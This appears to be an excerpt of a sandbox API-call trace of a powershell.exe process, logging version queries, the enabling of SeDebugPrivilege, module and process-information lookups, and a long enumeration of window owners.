	[0917.624] lstrcpyW (in: lpString1=0x434f40, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0917.624] CoTaskMemFree (pv=0x434f40) 
	[0917.624] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e8773c, puLen=0x22df40) returned 1
	[0917.624] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0917.624] CoTaskMemAlloc (cb=0x20) returned 0x4e9790
	[0917.624] lstrcpyW (in: lpString1=0x4e9790, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0917.624] CoTaskMemFree (pv=0x4e9790) 
	[0917.625] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e873e4, puLen=0x22df40) returned 1
	[0917.625] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0917.625] CoTaskMemAlloc (cb=0x66) returned 0x45b9a0
	[0917.625] lstrcpyW (in: lpString1=0x45b9a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0917.625] CoTaskMemFree (pv=0x45b9a0) 
	[0917.625] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x0, puLen=0x22df40) returned 0
	[0917.625] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x0, puLen=0x22df40) returned 0
	[0917.625] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x0, puLen=0x22df40) returned 0
	[0917.625] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22df18, puLen=0x22df10 | out: lplpBuffer=0x22df18*=0x2e8738c, puLen=0x22df10) returned 1
	[0917.627] CoTaskMemAlloc (cb=0x204) returned 0x47e330
	[0917.627] VerLanguageNameW (in: wLang=0x0, szLang=0x47e330, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0917.628] CoTaskMemFree (pv=0x47e330) 
	[0917.628] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\", lplpBuffer=0x22df68, puLen=0x22df60 | out: lplpBuffer=0x22df68*=0x2e87318, puLen=0x22df60) returned 1
	[0917.634] GetCurrentProcessId () returned 0xcb4
	[0918.431] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22ce90 | out: lpLuid=0x22ce90*(LowPart=0x14, HighPart=0)) returned 1
	[0918.434] GetCurrentProcess () returned 0xffffffffffffffff
	[0918.435] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x22ceb0 | out: TokenHandle=0x22ceb0*=0x2ac) returned 1
	[0918.436] AdjustTokenPrivileges (in: TokenHandle=0x2ac, DisableAllPrivileges=0, NewState=0x2e8ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0918.438] CloseHandle (hObject=0x2ac) returned 1
	[0918.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcb4) returned 0x2ac
	[0918.455] EnumProcessModules (in: hProcess=0x2ac, lphModule=0x2e8abd0, cb=0x200, lpcbNeeded=0x22dec8 | out: lphModule=0x2e8abd0, lpcbNeeded=0x22dec8) returned 1
	[0918.457] GetModuleInformation (in: hProcess=0x2ac, hModule=0x13f370000, lpmodinfo=0x2e8ae40, cb=0x18 | out: lpmodinfo=0x2e8ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0918.458] CoTaskMemAlloc (cb=0x804) returned 0x4ea3b0
	[0918.458] GetModuleBaseNameW (in: hProcess=0x2ac, hModule=0x13f370000, lpBaseName=0x4ea3b0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0918.458] CoTaskMemFree (pv=0x4ea3b0) 
	[0918.458] CoTaskMemAlloc (cb=0x804) returned 0x4ea3b0
	[0918.458] GetModuleFileNameExW (in: hProcess=0x2ac, hModule=0x13f370000, lpFilename=0x4ea3b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0918.458] CoTaskMemFree (pv=0x4ea3b0) 
	[0918.459] CloseHandle (hObject=0x2ac) returned 1
	[0918.467] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xcb4) returned 0x2ac
	[0918.468] GetExitCodeProcess (in: hProcess=0x2ac, lpExitCode=0x22dff8 | out: lpExitCode=0x22dff8*=0x103) returned 1
	[0919.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e8b088, Length=0x20000, ResultLength=0x22dfc0 | out: SystemInformation=0x12e8b088, ResultLength=0x22dfc0*=0x4a5f0) returned 0xc0000004
	[0919.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12eab0b8, Length=0x4cdf0, ResultLength=0x22dfc0 | out: SystemInformation=0x12eab0b8, ResultLength=0x22dfc0*=0x4a5f0) returned 0x0
	[0919.279] EnumWindows (lpEnumFunc=0x2c066ac, lParam=0x0) returned 1
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x558
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x538
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.281] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x778
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x778
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.282] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x460
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4d0
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2440
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x24d8
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1aa4
	[0919.283] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ff0
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1a84
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1fb0
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e10
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x23a8
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f24
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x21ec
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2320
	[0919.284] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1fd4
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1880
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b18
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1d6c
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x233c
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2368
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2124
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x22f0
	[0919.285] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x22ac
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1cdc
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x10f0
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f18
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x20a8
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2004
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f88
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1f84
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x2050
	[0919.286] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e04
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ecc
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e64
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b58
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e94
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1e28
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1df8
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1da8
	[0919.287] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1c70
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x163c
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1a10
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x186c
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1d74
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x4c8
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1960
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1ce4
	[0919.288] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b24
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x14e0
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x17f0
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x854
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1268
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1624
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b9c
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x16f4
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x145c
	[0919.289] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x17d0
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1d28
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xcb8
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1190
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x3a8
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1bd0
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1bfc
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1a78
	[0919.290] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b90
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b04
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b34
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b64
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1bb0
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1acc
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1a2c
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x19a8
	[0919.291] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1944
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x18c8
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x18ac
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x18ec
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1898
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc98
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x153c
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1808
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x12a4
	[0919.292] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1740
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x16c4
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1820
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x16ac
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1858
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1664
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x10b4
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x10ac
	[0919.293] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x10ec
	[0919.294] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1068
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x17e0
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x102c
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x17a4
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1050
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1694
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1770
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1720
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x165c
	[0920.331] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1578
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x16c0
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x161c
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1638
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x15c8
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1554
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1674
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1520
	[0920.332] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x14bc
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xf8c
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xe9c
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1434
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x14ec
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xfcc
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x12ac
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1484
	[0920.333] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x934
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc0c
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xb08
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x948
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1178
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x13e0
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xcd0
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x13fc
	[0920.334] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xdc8
	[0920.335] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc18
	[0920.335] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xc2c
	[0920.335] GetWindow (hWnd=0x105a6, uCmd=0x4) returned 0x0
	[0920.335] IsWindowVisible (hWnd=0x105a6) returned 0
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xa1c
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1244
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0xdb0
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1398
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1358
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1370
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1340
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x130c
	[0920.336] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x12c0
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x12e4
	[0920.337] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1270
